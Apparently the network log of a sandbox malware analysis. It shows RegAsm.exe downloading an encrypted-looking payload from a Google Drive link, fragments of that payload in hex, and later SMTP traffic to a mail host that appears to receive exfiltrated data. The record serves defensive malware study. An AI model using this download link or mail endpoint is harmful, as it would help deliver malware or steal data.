Oct 14, 2021 04:15:48.890292883 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890377998 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890440941 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890464067 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890494108 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890574932 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890598059 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890665054 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890685081 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890810013 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890850067 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890861988 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890876055 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891043901 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891079903 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891100883 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891186953 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891277075 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891287088 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891309023 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891448975 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891460896 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891484022 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891592979 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891618967 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891680956 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891702890 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891772032 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891845942 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.891855001 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.891874075 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892060995 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.892072916 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892096043 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892204046 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.892230988 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892297029 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892375946 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.892400980 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892456055 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.892554998 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.892577887 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892754078 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.892779112 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892972946 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.892988920 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893034935 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893052101 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893104076 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893203020 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893223047 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893323898 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893410921 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893435001 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893491030 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893589973 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893645048 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893666029 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893743992 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893800974 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893824100 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.893856049 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.893996954 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894048929 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894066095 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894165993 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894212008 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894232035 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894375086 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894383907 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894401073 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894499063 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894570112 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894634962 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894658089 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.894732952 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894814014 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.894836903 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895025015 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895067930 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895181894 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895273924 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895278931 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895287991 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895359993 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895370007 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895451069 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895452023 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895462036 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895489931 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.895612955 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895668030 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895721912 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.895737886 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:17:24.706707001 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.728167057 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.728395939 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.811098099 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.811794996 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.833708048 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.834151983 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.857367039 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.860424995 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.887386084 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.887486935 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.887567997 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.887624025 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.887729883 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.887789011 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.888670921 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.891997099 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:24.913861036 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:24.962604046 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.039819002 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.061616898 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.063045979 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.085180044 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.085645914 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.114952087 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.115622997 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.137628078 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.138050079 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.200640917 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.272274971 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.272720098 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.294678926 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.337587118 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.360786915 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.360826969 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.360903978 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.360975981 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:17:25.382628918 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.382661104 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.382680893 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:25.382702112 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:26.560708046 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:17:26.602941990 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:18:26.625785112 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:18:26.626110077 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:19:04.628603935 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:19:04.651602030 CEST	587	49788	185.111.89.226	192.168.11.20
Oct 14, 2021 04:19:04.651890993 CEST	49788	587	192.168.11.20	185.111.89.226
Oct 14, 2021 04:19:04.652384996 CEST	49788	587	192.168.11.20	185.111.89.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 04:15:47.563695908 CEST	55921	53	192.168.11.20	1.1.1.1
Oct 14, 2021 04:15:47.584059954 CEST	53	55921	1.1.1.1	192.168.11.20
Oct 14, 2021 04:15:48.407147884 CEST	54760	53	192.168.11.20	1.1.1.1
Oct 14, 2021 04:15:48.444083929 CEST	53	54760	1.1.1.1	192.168.11.20
Oct 14, 2021 04:17:24.591820002 CEST	57826	53	192.168.11.20	1.1.1.1
Oct 14, 2021 04:17:24.665316105 CEST	53	57826	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 14, 2021 04:15:47.563695908 CEST	192.168.11.20	1.1.1.1	0xe06c	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Oct 14, 2021 04:15:48.407147884 CEST	192.168.11.20	1.1.1.1	0x6496	Standard query (0)	doc-14-9g-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Oct 14, 2021 04:17:24.591820002 CEST	192.168.11.20	1.1.1.1	0x1227	Standard query (0)	mail.csavarcsapagyexpress.hu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 14, 2021 04:15:47.584059954 CEST	1.1.1.1	192.168.11.20	0xe06c	No error (0)	drive.google.com		172.217.168.46	A (IP address)	IN (0x0001)
Oct 14, 2021 04:15:48.444083929 CEST	1.1.1.1	192.168.11.20	0x6496	No error (0)	doc-14-9g-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Oct 14, 2021 04:15:48.444083929 CEST	1.1.1.1	192.168.11.20	0x6496	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.193	A (IP address)	IN (0x0001)
Oct 14, 2021 04:17:24.665316105 CEST	1.1.1.1	192.168.11.20	0x1227	No error (0)	mail.csavarcsapagyexpress.hu	csavarcsapagyexpress.hu		CNAME (Canonical name)	IN (0x0001)
Oct 14, 2021 04:17:24.665316105 CEST	1.1.1.1	192.168.11.20	0x1227	No error (0)	csavarcsapagyexpress.hu		185.111.89.226	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-14-9g-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49780	172.217.168.46	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-14 02:15:47 UTC	0	OUT	GET /uc?export=download&id=13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-10-14 02:15:48 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 14 Oct 2021 02:15:48 GMT Location: https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe57oar1vggbn97oksebnf1ht7/1634177700000/12448148553778765603/*/13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-JgVvLW4mHD9c9jo/n7EbBw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=N0CsjiJjTZgg-5UFYBHzzR9_I68DNckx6CfSYXxU7VpDRjij4DHs1cRdzuWKBgWUe1viAKtIfNeyozF8YuJ5qiGvhx9NrJWmEpq5LR2fPl5EhoExLRYZBVP-cj6c3BKLu-KGX-5ebfMt1SkPfZKg7X-_Mv-dpMjonJgQzQP4688; expires=Fri, 15-Apr-2022 02:15:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-14 02:15:48 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 39 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 36 66 39 33 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93
2021-10-14 02:15:48 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49781	142.250.185.193	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-14 02:15:48 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe57oar1vggbn97oksebnf1ht7/1634177700000/12448148553778765603/*/13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-9g-docs.googleusercontent.com Connection: Keep-Alive
2021-10-14 02:15:48 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdu_NoA3W9J0ZCcVLPYMsqjLFxGmD4XUqjQdkhtqo3_JBOIYTYoewk4pOKxpHHxOo2hS_CITVMPxmtRbnbHrUzs Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="nature_RCNGmH63.bin";filename*=UTF-8''nature_RCNGmH63.bin Content-Length: 221760 Date: Thu, 14 Oct 2021 02:15:48 GMT Expires: Thu, 14 Oct 2021 02:15:48 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=904p4w== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-14 02:15:48 UTC	5	IN	Data Raw: b9 9f cb d2 22 0b 2f 51 d5 3a 08 db 03 b9 77 d7 0f 47 08 26 4c 5b 8d 6f 82 cc 4f bb e1 9b 4a a8 b7 8c 7b d7 85 03 5b dd 38 70 c6 bc cc 35 bc ae 3b a5 00 bd d7 1b c8 c3 07 b4 7e 7e 92 42 fa ae cd 7d 77 59 d9 c4 4f 40 b8 60 c7 b9 c6 f7 57 f9 48 43 f6 b4 f0 40 f0 b0 82 55 76 f1 ef 22 16 d7 06 73 6a fe 12 5b 22 f0 58 0b dc 55 f2 5d ea 96 ca f8 18 e0 b9 9d 10 e1 27 7d 65 9c b2 ef bb d0 96 87 ef 85 6d 98 66 ec 66 73 91 81 ba 1e 67 d9 a6 3d 4b c3 31 78 08 bc 53 9c bc c7 a4 b2 e2 8d cf b0 e9 4a b8 d5 9d 9e c9 89 db 50 4a be 6e 15 f0 3a 6d 15 d1 4f 02 13 38 bc 78 17 49 d0 a8 62 c2 32 a3 3b c0 f0 8e b5 bb 40 74 91 f6 b7 81 59 60 de 61 58 02 9d 40 a9 a3 b4 41 17 7a c3 cf 54 0c 59 8a 5c ca 4b a3 66 2e 27 c2 25 b4 7b 3e f5 12 5b f9 ee 70 23 b6 a7 bf f7 08 c6 09 8d b8 Data Ascii: "/Q:wG&L[oOJ{[8p5;~~B}wYO@`WHC@Uv"sj["XU]'}emffsg=K1xSJPJn:mO8xIb2;@tY`aX@AzTY\Kf.'%{>[p#
2021-10-14 02:15:48 UTC	9	IN	Data Raw: 7a 1e 56 9d c5 3b 5b 51 8a 56 16 95 a9 6e 3c 57 c9 4a e3 5b 3e ff ce 73 d7 ec 70 25 fc 79 ad ff 3f c6 09 85 90 da 6f e9 fb 93 b9 9a 1b 93 95 34 ca 39 ff 9f c6 83 b2 0e 63 19 1c ed 6d 37 d2 5e 72 39 2d 64 5c b5 7d bf 1d 2d 10 bb f3 ad 1d e2 4a 95 0d b6 bd 90 81 6e be 0e 5e 7c 95 03 37 71 7e 80 1a 4a 5b f7 e0 6e fb 80 7f c8 d5 68 2f 0f 58 9a 23 1a ea a3 8b 0a c8 05 4a 27 8d fe 40 c8 6a e4 bf ab 60 78 62 33 3e d0 17 1c f9 d8 b7 99 22 9e f2 98 d8 ce bb 50 84 96 74 37 41 3b 14 80 3e 32 29 27 b8 ab 96 ee 6d 93 6e bd 30 77 02 c8 e3 25 c2 74 91 9a ad 6f 0f a8 c0 dd 29 75 0b 9d 49 82 38 fb 1c 6d 6c fb 94 ff bb d6 6c 8e 1e 92 d5 93 64 ca 2c e7 42 13 3e 1c 01 2e 01 83 f8 95 33 96 4d 51 3f d0 4c b6 38 8d 30 35 10 2b e8 89 f8 1c 14 43 a7 9c dc 88 24 46 7d 46 38 4b 9a Data Ascii: zV;[QVn<WJ[>sp%y?o49cm7^r9-d\}-Jn^\|7q~J[nh/X#J'@j`xb3>"Pt7A;>2)'mn0w%to)uI8mlld,B>.3MQ?L805+C$F}F8K
2021-10-14 02:15:48 UTC	13	IN	Data Raw: 1d 3a 6a d7 e9 91 26 93 b4 3f 4b dc 45 a0 a7 ea e4 b8 3d 89 f7 82 e6 1b 0c 4a d0 da d3 76 2f 79 74 58 34 42 a4 4a b8 1f e4 66 00 e0 72 50 2e ac f0 90 88 a2 4e 07 26 1a bf 7a 1a 47 55 81 b0 61 63 dd 16 e2 3a 51 1f 74 43 15 21 79 e6 43 21 28 e3 fa 4c 09 41 26 64 85 21 6f 71 08 81 18 02 38 d7 84 36 5d 13 b4 e9 91 b6 50 89 f3 9c 45 25 9a 8f 94 ff 9d e4 c7 0f 18 69 37 c7 6e 28 13 51 b7 21 55 6a 09 4b 45 c3 92 d3 61 fc ec 6c 32 fc d2 90 c4 31 a0 f2 91 f2 00 09 8b 0f ef 34 99 99 df ef 7e 8c fd b1 20 85 3c 21 e8 ea 96 cc 12 2f cd 8b 20 fa 40 ff 0a cc 76 6e 57 23 de ed 14 c4 59 31 d2 86 62 85 76 1d ad 88 10 0f ad 1f d0 24 80 e9 ca f1 5a 44 58 f4 1d e2 58 8f ba b7 2a 33 a4 cc e6 d2 fe da a7 74 32 b2 06 2c 78 1d 91 b4 d5 a8 0e 52 6a 9d ec b3 d9 f1 69 3d ce 76 c8 bc Data Ascii: :j&?KE=Jv/ytX4BJfrP.N&zGUac:QtC!yC!(LA&d!oq86]PE%i7n(Q!UjKEal214~ <!/ @vnW#Y1bv$ZDXX*3t2,xRji=v
2021-10-14 02:15:48 UTC	16	IN	Data Raw: a4 92 0a 00 a8 a2 dd c5 d2 64 d8 a7 78 32 0e 06 2c 78 2a c5 38 8a ae 1d 79 6a bb ee b3 d5 c8 39 17 70 72 e0 21 56 dd 8d 00 9f 23 e8 8d 12 ce 63 2e 22 73 a6 8f e3 2a 0d 0d 37 42 a9 5e fb 0c 5e 2a 38 44 0f f8 6b 4d 95 77 e3 83 68 a9 aa 44 a9 b9 e7 f5 0b 42 69 dd 3f c7 a7 53 7a a7 48 e9 d7 91 08 a5 57 57 a1 e8 f4 81 1b ed cf 60 38 ca 81 c5 63 6a 49 cf 21 e9 77 57 62 9e a9 53 1c 38 ae bf 77 31 c6 e4 20 8a db 24 a1 0e 8e c3 a3 a7 2d 86 11 49 f4 6a 9b b4 38 84 f3 94 b2 d2 e3 6f 00 35 4f 3a 39 5c 5c ed 13 6a ed 5f 53 a6 12 dd ba 90 46 cc b1 b7 67 73 de e0 b1 68 0b e1 49 b7 d1 a4 26 6b c1 88 12 49 6d 49 71 dc 04 1f e5 81 2a e8 78 d3 42 17 f3 61 02 b0 11 65 24 0a 6c 07 24 89 d4 52 34 c4 33 07 85 3c 49 dc 44 9e 3e ba 2e da bc 33 44 1e 88 63 78 6a bb 1e 23 bf 12 b3 Data Ascii: 